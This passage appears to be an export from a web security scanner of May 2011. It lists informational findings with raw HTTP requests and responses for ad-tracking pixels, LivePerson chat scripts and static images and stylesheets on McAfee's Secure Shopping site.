HTTP/1.1 302 Found Connection: close Location: http://segment-pixel Set-Cookie: d=ENQBWwHgBoHyDhmtEq P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 0 Date: Sun, 15 May 2011 21:31:35 GMT Server: QS |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.rubicon |
Path: | /tap.php |
GET /tap.php?v=5671&nid=2081 Host: pixel.rubiconproject.com Proxy-Connection: keep-alive Referer: http://d.xp1.ru4.com/meta User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: put_2146=xn7ja41kw4n |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:53 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.3 P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: rpb=5671%3D1; expires=Wed, 15-Jun-2011 01:19:53 GMT; path=/; domain=.rubiconproject Set-Cookie: rpx=5671%3D11993%2C0%2C2 Set-Cookie: put_2081=AG-00000001 Content-Length: 49 Content-Type: image/gif GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.rubicon |
Path: | /tap.php |
GET /tap.php?v=4212&nid=1185 Host: pixel.rubiconproject.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: put_2146=xn7ja41kw4n |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:26:19 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.3 P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: rpb=5671%3D1%264212%3D1; expires=Wed, 15-Jun-2011 01:26:19 GMT; path=/; domain=.rubiconproject Set-Cookie: rpx=5671%3D11993%2C0%2C1 Set-Cookie: put_1185=43258972898 Content-Length: 49 Content-Type: image/gif GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://r.openx.net |
Path: | /set |
GET /set?pid=21a19823-5de3 Host: r.openx.net Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: i=5cb31120-2bcf-44f1-b2a9 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:26:09 GMT Server: Apache Cache-Control: public, max-age=30, proxy-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache P3P: CP="CUR ADM OUR NOR STA NID" Set-Cookie: i=5cb31120-2bcf-44f1-b2a9 Content-Length: 43 Connection: close Content-Type: image/gif GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /r/bd |
GET /r/bd?ddc=1&pid=54&cver=1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:26:20 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:26:20 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /r/beacon |
GET /r/beacon?b2=FLmRqLw Host: r.turn.com Proxy-Connection: keep-alive Referer: http://sony.links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=4325897289836481830; pf=j9tCwElDbZnXmBEvu |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Fri, 11-Nov-2011 20:26:57 GMT; Path=/ Set-Cookie: pf=_fnFNfxp6XXik7nKu Content-Type: image/gif Content-Length: 43 Date: Sun, 15 May 2011 20:26:57 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /r/du/id/L21rdC8xL21 |
GET /r/du/id/L21rdC8xL21 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/ Set-Cookie: rrs=1002%7C1; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/ Set-Cookie: rds=15110%7C15110; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/ Location: http://d.p-td.com/r/dm Content-Length: 0 Date: Mon, 16 May 2011 01:19:58 GMT |
Severity: | Information |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /server/pixel.htm |
GET /server/pixel.htm?fpid=4 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:22:28 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 16 May 2011 01:22:27 GMT Content-Length: 335 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://r1-ads.ace |
Path: | /site=786652/size=728090 |
GET /site=786652/size=728090 Host: r1-ads.ace.advertising Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=qw280013054845430029 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:20:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising Comscore: CMXID=2115.1007584.786652 Set-Cookie: C2=JvH0NFJwHsb0FtfqH Set-Cookie: F1=Bk8eQ3EBAAAABAAAA Set-Cookie: BASE=x7Q9Mi23SwnkpMd Set-Cookie: ROLL=U6APIjeKkzEWubp Set-Cookie: 71920917=_4dd07bc9 Cache-Control: private, max-age=0, no-cache Expires: Mon, 16 May 2011 01:20:10 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 601 document.write('<SCRIPT language=\'JavaScript1.1\ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sales.liveperson |
Path: | /hc/46281118/ |
GET /hc/46281118/?&site Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.petco.com/?AID User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: HumanClickKEY=565553 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:44:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Mon, 16 May 2011 01:44:12 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({ |
Severity: | Information |
Confidence: | Certain |
Host: | http://sales.liveperson |
Path: | /hc/53965383/ |
GET /hc/53965383/?&site Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.toshibadirect User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: HumanClickKEY=764357 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:41:50 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Mon, 16 May 2011 01:41:50 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({ |
Severity: | Information |
Confidence: | Certain |
Host: | http://sales.liveperson |
Path: | /hc/71737897/ |
GET /hc/71737897/?&site Host: sales.liveperson.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: HumanClickKEY=154731 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:20:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Sun, 15 May 2011 21:20:08 GMT Set-Cookie: HumanClickSiteContainerID Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 119 lpConnLib.Process({ |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | / |
GET / HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Set-Cookie: user=id=1305509541690-1 Content-Type: text/html; charset=utf-8 Content-Length: 42652 Date: Mon, 16 May 2011 01:39:49 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>McAfee Secure Shopping - Secure Online Shopping</title> <meta name="d ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /css/home.css |
GET /css/home.css HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:24 GMT ETag: "CdLEBc9iPjr" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: text/css; charset=utf-8 Content-Length: 1065 Date: Mon, 16 May 2011 01:32:24 GMT div.card1 { width: 265px; height: 128px; } div.card2 { font-size: 11px; padding-left: 70px; padding-top: 60px;; padding-right: 10px; } td.catrow { padding-left: 10p ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /css/public.css |
GET /css/public.css?1 HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:40:08 GMT ETag: "CdLEBc9iQFL" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: text/css; charset=utf-8 Content-Length: 3209 Date: Mon, 16 May 2011 01:40:07 GMT body, td, div, p, th { font: 12px arial; color: #333; text-align: left; } #wrapper { width: 960px; margin: auto; text-align: left; } a { color: #336699; } a:vis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/banner_arrow.gif |
GET /images/banner_arrow.gif HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:33 GMT ETag: "CdLEBc9iPTz" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 49 Date: Mon, 16 May 2011 01:32:32 GMT GIF89a..........fff!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/banner_mfes |
GET /images/banner_mfes Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:33 GMT ETag: "CdLEBc9iT9H" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Date: Mon, 16 May 2011 01:32:33 GMT Content-Length: 19077 GIF89a..9........<V...... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/banner_sa.gif |
GET /images/banner_sa.gif HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:33 GMT ETag: "CdLEBc9iQ9a" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 6808 Date: Mon, 16 May 2011 01:32:32 GMT GIF89a..S...............7 i.g..,.....o.....r.x...=. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/banner_tp_081610 |
GET /images/banner_tp_081610 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:33 GMT ETag: "CdLEBc9iRhj" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 9121 Date: Mon, 16 May 2011 01:32:32 GMT GIF89a..S.......Y..a"2..2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/bgarea_690x250 |
GET /images/bgarea_690x250 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:38 GMT ETag: "CdLEBc9iPjK" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/png; charset=utf-8 Content-Length: 1032 Date: Mon, 16 May 2011 01:32:37 GMT .PNG . ...IHDR...............3.... ..n.q..7.U.}d........x.@. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/btn_compare_up |
GET /images/btn_compare_up Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:33 GMT ETag: "CdLEBc9iPwK" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 1864 Date: Mon, 16 May 2011 01:32:32 GMT GIF89a..$........5V.r.... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/btn_seeit_up.gif |
GET /images/btn_seeit_up.gif HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:32 GMT ETag: "CdLEBc9iPuR" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 1743 Date: Mon, 16 May 2011 01:32:32 GMT GIF89a..$.....1R.-N..8.&F ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/category_blank |
GET /images/category_blank Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:38 GMT ETag: "CdLEBc9iQdJ" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/png; charset=utf-8 Content-Length: 4743 Date: Mon, 16 May 2011 01:32:37 GMT .PNG . ...IHDR.......%......Qg.... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/category_blank |
GET /images/category_blank Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:37 GMT ETag: "CdLEBc9iPYn" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/jpeg; charset=utf-8 Content-Length: 357 Date: Mon, 16 May 2011 01:32:36 GMT ......JFIF.....H.H.....C. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/category_bottom |
GET /images/category_bottom Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:38 GMT ETag: "CdLEBc9iQg+" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/png; charset=utf-8 Content-Length: 4988 Date: Mon, 16 May 2011 01:32:37 GMT .PNG . ...IHDR.......*.....b...... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/category_top.png |
GET /images/category_top.png HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:30 GMT ETag: "CdLEBc9iQc7" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/png; charset=utf-8 Content-Length: 4729 Date: Mon, 16 May 2011 01:32:30 GMT .PNG . ...IHDR.......(...../.t.... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/favicon.ico |
GET /images/favicon.ico HTTP/1.1 Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:50 GMT ETag: "CdLEBc9iPi7" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: text/html; charset=utf-8 Content-Length: 1017 Date: Mon, 16 May 2011 01:32:50 GMT GIF89a............]^ 5.5V.Db..?. 4.;..4..E.....?..B..3.....& 2..)...........A. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/footer-search-bg |
GET /images/footer-search-bg Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
HTTP/1.1 200 OK Vary: Accept-Encoding Server: McAfeeSecure Expires: Tue, 17 May 2011 01:32:39 GMT ETag: "CdLEBc9iPVk" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Set-Cookie: user=id=1305509541690-1 Content-Type: image/gif; charset=utf-8 Content-Length: 162 Date: Mon, 16 May 2011 01:32:39 GMT GIF89a..&................ |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | /images/footer-search |
GET /images/footer-search Host: secureshopping.mcafee.com Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E73DAF |
